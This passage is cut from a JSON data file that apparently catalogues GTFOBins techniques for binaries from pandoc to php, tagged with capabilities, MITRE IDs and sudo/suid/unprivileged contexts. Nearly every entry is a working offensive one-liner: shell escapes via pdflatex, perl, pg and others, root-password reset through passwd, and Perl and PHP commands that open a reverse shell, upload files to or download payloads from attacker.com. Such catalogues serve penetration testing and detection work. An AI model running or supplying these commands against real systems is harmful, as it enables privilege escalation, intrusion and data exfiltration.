/path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pandoc/"]},{"id":"gtfo:pandoc:inherit:0:sudo","toolId":"gtfo:pandoc","toolName":"pandoc","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"echo '...' >/path/to/temp-file\npandoc -L /path/to/temp-file /dev/null","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pandoc/"]},{"id":"gtfo:pandoc:inherit:0:suid","toolId":"gtfo:pandoc","toolName":"pandoc","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"echo '...' >/path/to/temp-file\npandoc -L /path/to/temp-file /dev/null","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pandoc/"]},{"id":"gtfo:pandoc:inherit:0:unprivileged","toolId":"gtfo:pandoc","toolName":"pandoc","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload"],"nativeCategory":["inherit","from:lua"],"command":"echo '...' >/path/to/temp-file\npandoc -L /path/to/temp-file /dev/null","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pandoc/"]},{"id":"gtfo:passwd:privilege-escalation:0:sudo","toolId":"gtfo:passwd","toolName":"passwd","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"echo -e 'x\\nx' | passwd","description":"This changes the root password to `x`, so it's now possible to log in using, for example, `su`.","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/passwd/"]},{"id":"gtfo:paste:file-read:0:sudo","toolId":"gtfo:paste","toolName":"paste","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"paste /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/paste/"]},{"id":"gtfo:paste:file-read:0:suid","toolId":"gtfo:paste","toolName":"paste","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"paste /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/paste/"]},{"id":"gtfo:paste:file-read:0:unprivileged","toolId":"gtfo:paste","toolName":"paste","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"paste /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/paste/"]},{"id":"gtfo:pax:file-read:0:sudo","toolId":"gtfo:pax","toolName":"pax","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pax -w /path/to/input-file | tar -xO","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pax/"]},{"id":"gtfo:pax:file-read:0:suid","toolId":"gtfo:pax","toolName":"pax","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pax -w /path/to/input-file | tar -xO","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pax/"]},{"id":"gtfo:pax:file-read:0:unprivileged","toolId":"gtfo:pax","toolName":"pax","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"pax -w /path/to/input-file | tar -xO","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pax/"]},{"id":"gtfo:pdb:inherit:0:sudo","toolId":"gtfo:pdb","toolName":"pdb","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"echo '...' >/path/to/temp-file\npdb /path/to/temp-file\ncont","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pdb/"]},{"id":"gtfo:pdb:inherit:0:unprivileged","toolId":"gtfo:pdb","toolName":"pdb","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:python"],"command":"echo '...' >/path/to/temp-file\npdb /path/to/temp-file\ncont","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pdb/"]},{"id":"gtfo:pdflatex:file-read:0:sudo","toolId":"gtfo:pdflatex","toolName":"pdflatex","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pdflatex '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{/path/to/input-file}\\end{document}'\npdftotext texput.pdf -","description":"The read file will be part of the PDF output.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pdflatex/"]},{"id":"gtfo:pdflatex:file-read:0:suid","toolId":"gtfo:pdflatex","toolName":"pdflatex","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pdflatex '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{/path/to/input-file}\\end{document}'\npdftotext texput.pdf -","description":"The read file will be part of the PDF output.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pdflatex/"]},{"id":"gtfo:pdflatex:file-read:0:unprivileged","toolId":"gtfo:pdflatex","toolName":"pdflatex","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"pdflatex '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{/path/to/input-file}\\end{document}'\npdftotext texput.pdf -","description":"The read file will be part of the PDF output.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pdflatex/"]},{"id":"gtfo:pdflatex:file-write:0:sudo","toolId":"gtfo:pdflatex","toolName":"pdflatex","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"pdflatex '\\documentclass{article}\\newwrite\\tempfile\\begin{document}\\immediate\\openout\\tempfile=output-file.tex\\immediate\\write\\tempfile{DATA}\\immediate\\closeout\\tempfile\\end{document}'","description":"The file can only be written in the current directory, and the `.tex` extension is mandatory.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pdflatex/"]},{"id":"gtfo:pdflatex:file-write:0:suid","toolId":"gtfo:pdflatex","toolName":"pdflatex","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"pdflatex '\\documentclass{article}\\newwrite\\tempfile\\begin{document}\\immediate\\openout\\tempfile=output-file.tex\\immediate\\write\\tempfile{DATA}\\immediate\\closeout\\tempfile\\end{document}'","description":"The file can only be written in the current directory, and the `.tex` extension is mandatory.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pdflatex/"]},{"id":"gtfo:pdflatex:file-write:0:unprivileged","toolId":"gtfo:pdflatex","toolName":"pdflatex","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"pdflatex '\\documentclass{article}\\newwrite\\tempfile\\begin{document}\\immediate\\openout\\tempfile=output-file.tex\\immediate\\write\\tempfile{DATA}\\immediate\\closeout\\tempfile\\end{document}'","description":"The file can only be written in the current directory, and the `.tex` extension is mandatory.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pdflatex/"]},{"id":"gtfo:pdflatex:shell:0:sudo","toolId":"gtfo:pdflatex","toolName":"pdflatex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pdflatex --shell-escape '\\documentclass{article}\\begin{document}\\immediate\\write18{/bin/sh}\\end{document}'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pdflatex/"]},{"id":"gtfo:pdflatex:shell:0:suid","toolId":"gtfo:pdflatex","toolName":"pdflatex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pdflatex --shell-escape '\\documentclass{article}\\begin{document}\\immediate\\write18{/bin/sh}\\end{document}'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pdflatex/"]},{"id":"gtfo:pdflatex:shell:0:unprivileged","toolId":"gtfo:pdflatex","toolName":"pdflatex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"pdflatex --shell-escape '\\documentclass{article}\\begin{document}\\immediate\\write18{/bin/sh}\\end{document}'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pdflatex/"]},{"id":"gtfo:pdftex:shell:0:sudo","toolId":"gtfo:pdftex","toolName":"pdftex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pdftex --shell-escape '\\write18{/bin/sh}\\end'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pdftex/"]},{"id":"gtfo:pdftex:shell:0:suid","toolId":"gtfo:pdftex","toolName":"pdftex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pdftex --shell-escape '\\write18{/bin/sh}\\end'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pdftex/"]},{"id":"gtfo:pdftex:shell:0:unprivileged","toolId":"gtfo:pdftex","toolName":"pdftex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"pdftex --shell-escape '\\write18{/bin/sh}\\end'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pdftex/"]},{"id":"gtfo:perf:shell:0:sudo","toolId":"gtfo:perf","toolName":"perf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"perf stat /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/perf/"]},{"id":"gtfo:perf:shell:0:suid","toolId":"gtfo:perf","toolName":"perf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"perf stat /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/perf/"]},{"id":"gtfo:perf:shell:0:unprivileged","toolId":"gtfo:perf","toolName":"perf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"perf stat /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/perf/"]},{"id":"gtfo:perl:download:0:sudo","toolId":"gtfo:perl","toolName":"perl","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"perl -MIO::Socket::INET -e '$s=new IO::Socket::INET(PeerAddr=>\"attacker.com\",PeerPort=>80,Proto=>\"tcp\") or die; print $s \"GET /path/to/input-file HTTP/1.1\\r\\nHost: attacker.com\\r\\nMetadata: true\\r\\nConnection: close\\r\\n\\r\\n\"; open(my $fh, \">\", \"/path/to/output-file\") or die; $in_content = 0; while (<$s>) { if ($in_content) { print $fh $_; } elsif ($_ eq \"\\r\\n\") { $in_content = 1; } } close($s); close($fh);'","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/perl/"]},{"id":"gtfo:perl:download:0:unprivileged","toolId":"gtfo:perl","toolName":"perl","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download"],"nativeCategory":["download"],"command":"perl -MIO::Socket::INET -e '$s=new IO::Socket::INET(PeerAddr=>\"attacker.com\",PeerPort=>80,Proto=>\"tcp\") or die; print $s \"GET /path/to/input-file HTTP/1.1\\r\\nHost: attacker.com\\r\\nMetadata: true\\r\\nConnection: close\\r\\n\\r\\n\"; open(my $fh, \">\", \"/path/to/output-file\") or die; $in_content = 0; while (<$s>) { if ($in_content) { print $fh $_; } elsif ($_ eq \"\\r\\n\") { $in_content = 1; } } close($s); close($fh);'","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/perl/"]},{"id":"gtfo:perl:file-read:0:sudo","toolId":"gtfo:perl","toolName":"perl","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"perl -ne print /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/perl/"]},{"id":"gtfo:perl:file-read:0:suid","toolId":"gtfo:perl","toolName":"perl","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"perl -ne print /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/perl/"]},{"id":"gtfo:perl:file-read:0:unprivileged","toolId":"gtfo:perl","toolName":"perl","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"perl -ne print /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/perl/"]},{"id":"gtfo:perl:reverse-shell:0:sudo","toolId":"gtfo:perl","toolName":"perl","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"perl -e 'use Socket;$i=\"attacker.com\";$p=12345;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/perl/"]},{"id":"gtfo:perl:reverse-shell:0:unprivileged","toolId":"gtfo:perl","toolName":"perl","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"perl -e 'use Socket;$i=\"attacker.com\";$p=12345;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/perl/"]},{"id":"gtfo:perl:shell:0:capabilities","toolId":"gtfo:perl","toolName":"perl","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec \"/bin/sh\"'","mitre":["T1059"],"privilege":"capabilities","context":"capabilities","references":["https://gtfobins.github.io/gtfobins/perl/"]},{"id":"gtfo:perl:shell:0:sudo","toolId":"gtfo:perl","toolName":"perl","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"perl -e 'exec \"/bin/sh\"'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/perl/"]},{"id":"gtfo:perl:shell:0:unprivileged","toolId":"gtfo:perl","toolName":"perl","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"perl -e 'exec \"/bin/sh\"'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/perl/"]},{"id":"gtfo:perl:shell:1:sudo","toolId":"gtfo:perl","toolName":"perl","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"PERL5OPT=-d PERL5DB='exec \"/bin/sh\"' perl /dev/null","description":"The `/dev/null` part can be omitted, just use `Ctrl-D` in order to spawn the shell.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/perl/"]},{"id":"gtfo:perl:shell:1:unprivileged","toolId":"gtfo:perl","toolName":"perl","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"PERL5OPT=-d PERL5DB='exec \"/bin/sh\"' perl /dev/null","description":"The `/dev/null` part can be omitted, just use `Ctrl-D` in order to spawn the shell.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/perl/"]},{"id":"gtfo:perl:upload:0:sudo","toolId":"gtfo:perl","toolName":"perl","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"perl -MIO::Socket::INET -e '$s = new IO::Socket::INET(PeerAddr=>\"attacker.com\", PeerPort=>80, Proto=>\"tcp\") or die;open(my $file, \"<\", \"/path/to/input-file\") or die;$content = join(\"\", <$file>);close($file);$headers = \"POST / HTTP/1.1\\r\\nHost: attacker.com\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\nContent-Length: \" . length($content) . \"\\r\\nConnection: close\\r\\n\\r\\n\";print $s $headers . $content;while (<$s>) { }close($s);'","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/perl/"]},{"id":"gtfo:perl:upload:0:unprivileged","toolId":"gtfo:perl","toolName":"perl","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"perl -MIO::Socket::INET -e '$s = new IO::Socket::INET(PeerAddr=>\"attacker.com\", PeerPort=>80, Proto=>\"tcp\") or die;open(my $file, \"<\", \"/path/to/input-file\") or die;$content = join(\"\", <$file>);close($file);$headers = \"POST / HTTP/1.1\\r\\nHost: attacker.com\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\nContent-Length: \" . length($content) . \"\\r\\nConnection: close\\r\\n\\r\\n\";print $s $headers . $content;while (<$s>) { }close($s);'","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/perl/"]},{"id":"gtfo:perlbug:shell:0:sudo","toolId":"gtfo:perlbug","toolName":"perlbug","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"perlbug -s 'x x x' -r x -c x -e 'exec /bin/sh #'","description":"This requires to press `Enter` serveral times before the shell is spawn.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/perlbug/"]},{"id":"gtfo:perlbug:shell:0:unprivileged","toolId":"gtfo:perlbug","toolName":"perlbug","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"perlbug -s 'x x x' -r x -c x -e 'exec /bin/sh #'","description":"This requires to press `Enter` serveral times before the shell is spawn.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/perlbug/"]},{"id":"gtfo:pexec:shell:0:sudo","toolId":"gtfo:pexec","toolName":"pexec","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pexec /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pexec/"]},{"id":"gtfo:pexec:shell:0:suid","toolId":"gtfo:pexec","toolName":"pexec","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pexec /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pexec/"]},{"id":"gtfo:pexec:shell:0:unprivileged","toolId":"gtfo:pexec","toolName":"pexec","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"pexec /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pexec/"]},{"id":"gtfo:pg:file-read:0:sudo","toolId":"gtfo:pg","toolName":"pg","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pg /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pg/"]},{"id":"gtfo:pg:file-read:0:suid","toolId":"gtfo:pg","toolName":"pg","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pg /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pg/"]},{"id":"gtfo:pg:file-read:0:unprivileged","toolId":"gtfo:pg","toolName":"pg","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"pg /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pg/"]},{"id":"gtfo:pg:shell:0:sudo","toolId":"gtfo:pg","toolName":"pg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pg /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pg/"]},{"id":"gtfo:pg:shell:0:suid","toolId":"gtfo:pg","toolName":"pg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pg /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pg/"]},{"id":"gtfo:pg:shell:0:unprivileged","toolId":"gtfo:pg","toolName":"pg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"pg /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pg/"]},{"id":"gtfo:php:command:0:sudo","toolId":"gtfo:php","toolName":"php","name":"command","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"php -r 'echo shell_exec(\"/path/to/command\");'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:command:0:suid","toolId":"gtfo:php","toolName":"php","name":"command","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"php -r 'echo shell_exec(\"/path/to/command\");'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:command:0:unprivileged","toolId":"gtfo:php","toolName":"php","name":"command","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["command"],"command":"php -r 'echo shell_exec(\"/path/to/command\");'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:command:1:sudo","toolId":"gtfo:php","toolName":"php","name":"command","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"php -r '$r=array(); exec(\"/path/to/command\", $r); print(join(\"\\n\",$r));'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:command:1:suid","toolId":"gtfo:php","toolName":"php","name":"command","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"php -r '$r=array(); exec(\"/path/to/command\", $r); print(join(\"\\n\",$r));'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:command:1:unprivileged","toolId":"gtfo:php","toolName":"php","name":"command","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["command"],"command":"php -r '$r=array(); exec(\"/path/to/command\", $r); print(join(\"\\n\",$r));'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:command:2:sudo","toolId":"gtfo:php","toolName":"php","name":"command","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"php -r '$p = array(array(\"pipe\",\"r\"),array(\"pipe\",\"w\"),array(\"pipe\", \"w\"));$h = @proc_open(\"/path/to/command\", $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:command:2:suid","toolId":"gtfo:php","toolName":"php","name":"command","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"php -r '$p = array(array(\"pipe\",\"r\"),array(\"pipe\",\"w\"),array(\"pipe\", \"w\"));$h = @proc_open(\"/path/to/command\", $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:command:2:unprivileged","toolId":"gtfo:php","toolName":"php","name":"command","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["command"],"command":"php -r '$p = array(array(\"pipe\",\"r\"),array(\"pipe\",\"w\"),array(\"pipe\", \"w\"));$h = @proc_open(\"/path/to/command\", $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:download:0:sudo","toolId":"gtfo:php","toolName":"php","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"php -r '$c=file_get_contents(\"http://attacker.com/path/to/input-file\"); file_put_contents(\"/path/to/output-file\", $c);'","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:download:0:suid","toolId":"gtfo:php","toolName":"php","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"php -r '$c=file_get_contents(\"http://attacker.com/path/to/input-file\"); file_put_contents(\"/path/to/output-file\", $c);'","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:download:0:unprivileged","toolId":"gtfo:php","toolName":"php","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download"],"nativeCategory":["download"],"command":"php -r '$c=file_get_contents(\"http://attacker.com/path/to/input-file\"); file_put_contents(\"/path/to/output-file\", $c);'","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/php/"]},{"id":"gtfo:php:file-read:0:sudo","toolId":"gtfo:php","toolName":"php","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"php -r 